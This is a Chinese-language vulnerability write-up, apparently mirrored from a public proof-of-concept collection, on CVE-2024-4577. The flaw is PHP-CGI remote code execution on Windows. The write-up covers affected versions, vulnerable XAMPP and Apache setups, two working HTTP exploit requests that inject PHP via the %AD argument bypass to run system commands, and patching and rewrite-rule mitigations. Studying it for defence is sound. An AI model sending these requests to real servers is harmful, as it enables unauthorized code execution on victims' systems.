mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
141 lines
3.8 KiB
Markdown
141 lines
3.8 KiB
Markdown
# PHP CGI Windows 平台远程代码执行漏洞 CVE-2024-4577
|
||
|
||
## 漏洞描述
|
||
|
||
PHP 在设计时忽略 Windows 中对字符转换的 Best-Fit 特性,当 PHP 运行在 Window 平台且使用了如下语系(简体中文 936/繁体中文 950/日文 932 等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 保护,从而可在无需登陆的情况下执行任意 PHP 代码。
|
||
|
||
参考链接:
|
||
|
||
- https://ti.qianxin.com/vulnerability/notice-detail/1020?type=risk
|
||
|
||
## 漏洞影响
|
||
|
||
主要影响 PHP 在 Windows 操作系统上的安装版本:
|
||
|
||
```
|
||
PHP 8.3 < 8.3.8
|
||
PHP 8.2 < 8.2.20
|
||
PHP 8.1 < 8.1.29
|
||
```
|
||
|
||
查看 Windows 操作系统默认编码(936 为中文 GBK,65001 为 UTF-8):
|
||
|
||
```
|
||
chcp
|
||
```
|
||
|
||
## 环境搭建
|
||
|
||
### 场景 1 - 在 CGI 模式下运行 PHP
|
||
|
||
在配置 Action 指令将相应的 HTTP 请求映射到 Apache HTTP Server 中的 PHP-CGI 可执行二进制文件时,可直接利用此漏洞。受影响的常见配置包括但不限于:
|
||
|
||
```
|
||
AddHandler cgi-script .php
|
||
Action cgi-script "/cgi-bin/php-cgi.exe"
|
||
```
|
||
|
||
或者
|
||
|
||
```
|
||
<FilesMatch "\.php$">
|
||
SetHandler application/x-httpd-php-cgi
|
||
</FilesMatch>
|
||
|
||
Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
|
||
```
|
||
|
||
### 场景 2 - 公开 PHP 二进制文件(默认的 XAMPP 配置)
|
||
|
||
常见场景包括但不限于:
|
||
|
||
1. 将 php.exe 或复制 php-cgi.exe 到/cgi-bin/目录。
|
||
2. 通过指令公开 PHP 目录 ScriptAlias,例如,在 XAMPP 默认配置 `httpd-xampp.conf` 中:
|
||
|
||
```
|
||
ScriptAlias /php-cgi/ "C:/xampp/php/"
|
||
```
|
||
|
||
[官网](https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.1.25/xampp-windows-x64-8.1.25-0-VS16-installer.exe) 搭建环境,php 版本 8.1.25。启动完成后,访问 `http://your-ip/dashboard` 即可看到 XAMPP 主页:
|
||
|
||

|
||
|
||
## 漏洞复现
|
||
|
||
poc1:
|
||
|
||
```
|
||
GET /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1
|
||
Host: your-ip
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
|
||
REDIRECT-STATUS:1
|
||
|
||
<?php system("dir");?>
|
||
```
|
||
|
||

|
||
|
||
poc2:
|
||
|
||
```
|
||
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
|
||
Host: your-ip
|
||
Content-Type: application/x-www-form-urlencoded
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
|
||
REDIRECT-STATUS:1
|
||
|
||
<?php system("dir");?>
|
||
```
|
||
|
||

|
||
|
||
## 漏洞修复
|
||
|
||
### 安全更新
|
||
|
||
目前官方已有可更新版本,建议受影响用户升级至最新版本:
|
||
|
||
```
|
||
PHP 8.3 >= 8.3.8
|
||
PHP 8.2 >= 8.2.20
|
||
PHP 8.1 >= 8.1.29
|
||
```
|
||
|
||
注:由于 PHP 8.0、PHP 7 和 PHP 5 的分支已终止使用,并且不再维护,服务器管理员可以参考“缓解方案”中的临时补丁建议。
|
||
|
||
官方下载地址:
|
||
|
||
https://www.php.net/downloads.php
|
||
|
||
### 缓解方案
|
||
|
||
#### 1. 对于无法升级 PHP 的用户
|
||
|
||
以下重写规则可用于阻止攻击。需要注意的是,这些规则仅对繁体中文、简体中文和日语语言环境起到临时缓解作用。在实际操作中,仍然建议更新到补丁版本或迁移架构。
|
||
|
||
```
|
||
RewriteEngine On
|
||
RewriteCond %{QUERY_STRING} ^%ad [NC]
|
||
RewriteRule .? - [F,L]
|
||
```
|
||
|
||
#### 2. 对于使用 XAMPP for Windows 的用户
|
||
|
||
如果确认不需要 PHP CGI 功能,可以通过修改以下 Apache HTTP Server 配置来避免受到该漏洞的影响:
|
||
|
||
```
|
||
C:/xampp/apache/conf/extra/httpd-xampp.conf
|
||
```
|
||
|
||
找到相应的行:
|
||
|
||
```
|
||
ScriptAlias /php-cgi/"C:/xampp/php/"
|
||
```
|
||
|
||
并将其注释掉:
|
||
|
||
```
|
||
# ScriptAlias /php-cgi/"C:/xampp/php/"
|
||
```
|